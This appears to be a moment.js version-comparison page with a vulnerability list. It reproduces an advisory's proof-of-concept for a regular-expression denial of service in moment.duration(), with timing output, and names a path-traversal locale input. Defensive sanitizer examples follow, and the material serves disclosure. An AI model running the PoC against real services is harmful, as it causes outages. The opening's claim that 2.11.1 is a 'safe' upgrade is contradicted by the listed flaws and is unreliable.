Moment.js, a widely used JavaScript library for date and time manipulation and formatting, saw a minor version update from 2.11.0 to 2.11.1 in early January 2016. Both versions share the same core functionality, offering developers robust tools for parsing, validating, manipulating, and displaying dates across various formats and timezones. Key features include flexible date parsing, comprehensive formatting options, and convenient date arithmetic.
Examining the package metadata, a developer might immediately notice that the devDependencies blocks remain largely identical between the two versions. This suggests that the update primarily focused on bug fixes and internal improvements rather than introducing new features or altering the existing API. The development dependencies listed, such as Grunt (for task automation), Karma (for testing), and UglifyJS (for minification), point to a well-maintained project with a strong emphasis on code quality and test coverage.
The most significant difference lies in the release dates. Version 2.11.0 was released on January 2nd, 2016, while version 2.11.1 followed shortly after, on January 9th, 2016. This short gap suggests that version 2.11.1 likely addresses critical bugs or regressions identified in version 2.11.0. Developers using older versions of Moment.js, or those who recently adopted 2.11.0, are advised to upgrade to 2.11.1 to benefit from the fixes and ensure stability. The author and other metadata remain the same, making this a safe and recommended upgrade for existing Moment.js users.
All known vulnerabilities affecting version 2.11.1 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
```javascript
var moment = require('moment');

// Build a string of `len + 1` copies of `chr`. Note that `i` is not declared
// with `var`, so this loop shares the global `i` with the outer loop below;
// that is why the printed COUNT advances by 10001 rather than 10000.
var genstr = function (len, chr) {
  var result = "";
  for (i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// Feed progressively longer inputs to moment.duration() and time each call.
for (i = 20000; i <= 10000000; i = i + 10000) {
  console.log("COUNT: " + i);
  var str = '-' + genstr(i, '1');
  console.log("LENGTH: " + str.length);
  var start = process.hrtime();
  moment.duration(str);
  var end = process.hrtime(start);
  console.log(end); // [seconds, nanoseconds] spent inside moment.duration()
}
```
```text
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```
Please update to version 2.11.2 or later.
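Upgrading removes the vulnerable pattern, but a server that accepts durations from clients should also refuse hostile input before it reaches any regex-based parser. The following is an added example, not code from moment.js or from the advisory: it caps input length and validates the ISO 8601 duration shape with a hand-written linear scanner (no backtracking), then hands only accepted strings to the parser. The names `MAX_DURATION_INPUT`, `isIsoDuration`, `safeDuration` and `demo` are this example's own, the length limit of 64 is an assumption, and the example assumes clients are only expected to send ISO 8601 durations (moment.duration() also accepts other string forms, which this allowlist would reject). The parser is injected so the block runs without moment installed.

```javascript
// Added example (not code from moment.js or the advisory): reject untrusted
// duration strings before they reach a backtracking regex parser.

// Assumption: no legitimate ISO 8601 duration from a client needs more than this.
const MAX_DURATION_INPUT = 64;

const DATE_UNITS = ['Y', 'M', 'W', 'D'];
const TIME_UNITS = ['H', 'M', 'S'];

function isDigit(c) {
  return c >= '0' && c <= '9';
}

// Linear-time scanner for [+-]P[nY][nM][nW][nD][T[nH][nM][n[.n]S]].
// Every character is visited once and nothing backtracks, so the cost is
// O(n), and n is already bounded by MAX_DURATION_INPUT.
function isIsoDuration(str) {
  if (typeof str !== 'string') return false;
  if (str.length === 0 || str.length > MAX_DURATION_INPUT) return false;
  let i = 0;
  if (str[i] === '-' || str[i] === '+') i++;
  if (str[i] !== 'P') return false;
  i++;
  let units = DATE_UNITS;   // unit letters still allowed, in their required order
  let nextUnit = 0;         // index into `units` of the next letter that may appear
  let inTime = false;
  let components = 0;
  while (i < str.length) {
    if (str[i] === 'T' && !inTime) {
      inTime = true;
      units = TIME_UNITS;
      nextUnit = 0;
      i++;
      if (i === str.length) return false; // a bare trailing 'T' is invalid
      continue;
    }
    const numStart = i;
    while (i < str.length && isDigit(str[i])) i++;
    if (i === numStart) return false;      // unit letter without a number
    let hasFraction = false;
    if (i < str.length && (str[i] === '.' || str[i] === ',')) {
      hasFraction = true;
      i++;
      const fracStart = i;
      while (i < str.length && isDigit(str[i])) i++;
      if (i === fracStart) return false;   // decimal mark without digits
    }
    if (i === str.length) return false;    // number without a unit letter
    const pos = units.indexOf(str[i], nextUnit);
    if (pos === -1) return false;          // unknown, repeated or out-of-order unit
    if (hasFraction && !(inTime && str[i] === 'S')) return false; // only seconds may be fractional
    nextUnit = pos + 1;
    components++;
    i++;
  }
  return components > 0;
}

// Gate an untrusted string in front of a parser such as moment.duration().
// `parse` is injected so this example runs without moment installed.
function safeDuration(input, parse) {
  if (!isIsoDuration(input)) {
    throw new RangeError('duration input rejected before parsing');
  }
  return parse(input);
}

// Demo: the advisory's input shape ('-' followed by many '1's, constructed
// here) is rejected immediately, while a well-formed duration reaches the parser.
function demo() {
  const hostile = '-' + '1'.repeat(20002);
  const parsed = [];
  let rejected = false;
  try {
    safeDuration(hostile, (s) => parsed.push(s));
  } catch (e) {
    rejected = e instanceof RangeError;
  }
  safeDuration('P1DT12H30M', (s) => parsed.push(s));
  return { rejected, parsed };
}
```

In production the injected `parse` would be `moment.duration`; the point is that the length cap and the scanner run in time proportional to the input, so the worst an attacker can do is cost 64 character comparisons.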
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if a user-provided locale string, e.g. `fr`, is directly used to switch the moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
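The advice above is best implemented as an allowlist rather than a blocklist of path characters. The following is an added example, not code from moment.js or from the advisory: a client-supplied locale name (or a whole Accept-Language header) is normalised, checked against a strict shape pattern that admits only letters, digits and hyphens, and then looked up in the set of locales the application actually ships; anything else, including the `dir/../../filename` form the advisory names, collapses to the default locale before `moment.locale()` is ever called. The names `SUPPORTED_LOCALES`, `DEFAULT_LOCALE`, `LOCALE_SHAPE`, `sanitizeLocale` and `localeFromAcceptLanguage` are this example's own, and the contents of the supported set are an assumption for illustration.

```javascript
// Added example (not code from moment.js or the advisory): choose a locale for
// moment.locale() only from an explicit allowlist, never from raw client input.

// Assumption: the locale definitions this application actually ships and loads.
const SUPPORTED_LOCALES = new Set(['en', 'en-gb', 'fr', 'fr-ch', 'de', 'zh-cn']);
const DEFAULT_LOCALE = 'en';

// Shape check only: one to three letters, then optional '-' separated subtags.
// It admits no '/', '\\' or '.', so nothing that could be read as a path survives.
const LOCALE_SHAPE = /^[a-z]{1,3}(?:-[a-z0-9]{1,8})*$/;

// Normalise a single candidate and accept it only if it is a supported locale.
function sanitizeLocale(name, supported = SUPPORTED_LOCALES, fallback = DEFAULT_LOCALE) {
  if (typeof name !== 'string') return fallback;
  const normalised = name.trim().toLowerCase().replace(/_/g, '-');
  if (!LOCALE_SHAPE.test(normalised)) return fallback;
  return supported.has(normalised) ? normalised : fallback;
}

// Pick the first supported locale from an Accept-Language header such as
// 'fr-CH, fr;q=0.9, de;q=0.7'. Candidates are ordered by q value, then header order.
function localeFromAcceptLanguage(header, supported = SUPPORTED_LOCALES, fallback = DEFAULT_LOCALE) {
  if (typeof header !== 'string') return fallback;
  const candidates = header.split(',').map((part, index) => {
    const [tag, ...params] = part.trim().split(';');
    let q = 1;
    for (const p of params) {
      const m = /^\s*q=(\d*(?:\.\d+)?)\s*$/.exec(p);
      if (m) q = parseFloat(m[1]);
    }
    return { tag: tag.trim(), q: Number.isNaN(q) ? 0 : q, index };
  });
  candidates.sort((a, b) => b.q - a.q || a.index - b.index);
  for (const c of candidates) {
    if (c.q <= 0) continue;
    const exact = sanitizeLocale(c.tag, supported, null);
    if (exact) return exact;
    // Fall back to the primary subtag ('fr-be' -> 'fr') when that region is not shipped.
    const primary = c.tag.split(/[-_]/)[0];
    const base = sanitizeLocale(primary, supported, null);
    if (base) return base;
  }
  return fallback;
}
```

The allowlist set is the real authority; the regular expression is only a cheap shape check that keeps obviously malformed strings from ever being compared, and it is anchored and free of nested quantifiers so it cannot itself become a denial-of-service vector.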